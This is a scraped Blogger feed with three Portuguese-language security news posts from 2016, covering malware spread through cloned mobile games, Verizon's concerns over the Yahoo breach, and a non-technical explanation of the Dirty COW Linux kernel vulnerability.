</footer>mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-83997716183361106472016-11-09T12:41:00.001-02:002016-11-09T12:41:54.446-02:00Jogos móveis são os mais utilizados para difundir malware<div style="background-color: white; font-family: "ARS Maquette", "Helvetica Neue", Arial, sans-serif; font-size: 16px; padding: 0px; text-align: justify;">
Cada vez mais os criminosos apontam novas formas para atacar dispositivos móveis. E um dos métodos que têm vindo a ser cada vez mais utilizado encontra-se na utilização de jogos móveis como engodo para instalar malware em equipamentos.</div>
<div style="background-color: white; font-family: "ARS Maquette", "Helvetica Neue", Arial, sans-serif; font-size: 16px; padding: 0px; text-align: justify;">
<br /></div>
<div style="background-color: white; font-family: "ARS Maquette", "Helvetica Neue", Arial, sans-serif; font-size: 16px; padding: 0px; text-align: justify;">
De acordo com um relatório da empresa de segurança <a class="vglnk" href="http://www.ebay.com/sch/i.html?_nkw=intel" rel="nofollow" style="color: #00569c; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Intel</a> Security, em 2014 o jogo Flappy Bird foi um dos mais copiados, com cerca de 80% das cópias a conterem algum tipo de malware. A mesma situação verificou-se recentemente com o Pokémon Go, onde várias aplicações surgiram com promessas de melhorarem o jogo, mas acabavam por instalar malware.</div>
<div style="background-color: white; font-family: "ARS Maquette", "Helvetica Neue", Arial, sans-serif; font-size: 16px; padding: 0px; text-align: justify;">
<br /></div>
<div style="background-color: white; font-family: "ARS Maquette", "Helvetica Neue", Arial, sans-serif; font-size: 16px; padding: 0px; text-align: justify;">
Como sempre, é importante ter atenção onde se realiza a instalação de aplicações. Devem sempre ser utilizadas as lojas de aplicações oficiais, evitando utilizar sites de terceiros. Cuidado redobrado deve também ser realizado sobre links que sejam enviados por mensagens ou aplicações de mensagens instantâneas.</div>
<div style="background-color: white; font-family: "ARS Maquette", "Helvetica Neue", Arial, sans-serif; font-size: 16px; padding: 0px; text-align: justify;">
<br /></div>
<div style="background-color: white; font-family: "ARS Maquette", "Helvetica Neue", Arial, sans-serif; font-size: 16px; padding: 0px; text-align: justify;">
Fonte <a href="https://www-ssl.intel.com/content/www/us/en/homepage.html" style="color: #00569c; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">Intel Security</a></div>
<img alt="android malware" src="http://files.tugatech.com.pt/imagens/topicos/tugatech-2016-11-08-db7c23c2-4b0e-4192-b177-2c1335aad74d.jpg" />mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-16142033102972681932016-10-27T14:25:00.000-02:002016-10-27T14:25:00.064-02:00Executiva da Verizon diz que empresa precisa de mais informações sobre ataque hacker ao Yahoo<div style="background-color: white; border: 0px; color: #666666; font-family: Arial; font-size: 13px; line-height: 1.4; margin-bottom: 15px; padding: 0px; text-align: justify;">
Uma executiva da Verizon disse que a aquisição do Yahoo ainda faz sentido, mas a gigante de telecomunicações precisa de mais informações sobre o volumoso vazamento de contas do provedor de emails.</div>
<div style="background-color: white; border: 0px; color: #666666; font-family: Arial; font-size: 13px; line-height: 1.4; margin-bottom: 15px; padding: 0px; text-align: justify;">
Falando em uma conferência de tecnologia promovido pelo The Wall Street Journal em Laguna Beach, na Califórnia, a vice-presidente executiva da Verizon, Marni Walden, disse que o Yahoo está investigando o vazamento de dados ocorrido em 2014 e ela espera resolver quaisquer questões relacionadas ao incidente em 60 dias.</div>
<div style="background-color: white; border: 0px; color: #666666; font-family: Arial; font-size: 13px; line-height: 1.4; margin-bottom: 15px; padding: 0px; text-align: justify;">
"Nós temos que ser cuidadosos sobre o que não sabemos", disse Walden, que também é diretora de inovação de produtos e novos negócios da Verizon. "Estamos trabalhando de perto com a equipe para tentar entender."</div>
<div style="background-color: white; border: 0px; color: #666666; font-family: Arial; font-size: 13px; line-height: 1.4; margin-bottom: 15px; padding: 0px; text-align: justify;">
<img alt="Resultado de imagem para yahoo" src="data:image/png;base64,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" /></div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-89554306505837306432016-10-23T19:39:00.000-02:002016-10-23T19:39:44.254-02:00Dirty COW: bug com 9 anos ameaça a segurança do Linux<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
O linux é tido como um sistema com elevados níveis de segurança e que estará imune a bugs e falhas. No entanto, tal como outros sistemas, a verdade é que o linux é também vítima de algumas vulnerabilidades.</div>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
<img alt="Dirty COW logo" height="400" src="https://pplware.sapo.pt/wp-content/uploads/2016/10/dirty_cow_linux_2-720x450.jpg" width="640" /></div>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
A mais recente falha descoberta está no kernel e aí tem residido nos últimos 9 anos. O Dirty COW afecta todas as distribuições e o seu nível de severidade é muito elevado.</div>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
Esta falha, o Dirty COW, poderia ser encarada como apenas mais uma falha que foi encontrada no kernel do Linux. Com o seu nome a ser derivado da função que é explorada, Copy On Write, permite aos atacantes obter privilégios dentro do sistema e assim ter acesso a todas as contas e a todas as funções.</div>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
O problema maior é que o Dirty COW tem já bastantes anos e está a ser activamente explorado. Em conjunto com outras falhas permite que o ataque seja realizado remotamente e sem qualquer necessidade de acesso direto às máquinas.</div>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
Já com o identificador CVE-2016-5195, esta falha estará presente em milhares de máquinas, muitas delas já sem qualquer suporte e, por isso, sem qualquer possibilidade de atualização.</div>
<h3 style="background-color: white; border: 0px; color: #444444; font-family: 'Roboto Condensed', sans-serif; font-size: 26px; font-stretch: inherit; font-weight: 400; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: justify; text-shadow: rgba(0, 0, 0, 0.0980392) 0px 1px 1px; vertical-align: baseline; word-wrap: break-word;">
Como funciona o Dirty COW</h3>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
O Dirty COW consegue obter sucesso ao explorar uma falha que existe em todas as versões do kernel de há vários anos para cá. Segundo o investigador que a descobriu é simples de ser explorada e uma vez conseguido, dá acesso a todas as permissões dentro do sistema.</div>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
O problema maior é mesmo a sua idade e a quantidade de equipamentos onde está presente. Com 9 anos de existência a falha dificilmente será resolvida na maioria das máquinas e sistemas onde está presente, dada a falta de suporte.</div>
<h3 style="background-color: white; border: 0px; color: #444444; font-family: 'Roboto Condensed', sans-serif; font-size: 26px; font-stretch: inherit; font-weight: 400; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: justify; text-shadow: rgba(0, 0, 0, 0.0980392) 0px 1px 1px; vertical-align: baseline; word-wrap: break-word;">
O Android também é afectado pelo Dirty COW?</h3>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
Infelizmente a resposta é sim. Sendo também um sistema baseado no kernel linux, o Android tem presente a vulnerabilidade Dirty COW. A Google já está alertada para o problema e partilhou com os seus parceiros o problema. Resta agora às marcas atualizarem os seus sistemas e os seus equipamentos.</div>
<div style="background-color: white; border: 0px; color: #333333; font-family: 'Source Sans Pro', Arial, sans-serif; font-size: 16px; font-stretch: inherit; line-height: 24px; margin-bottom: 1em; padding: 0px; text-align: justify; vertical-align: baseline; word-wrap: break-word;">
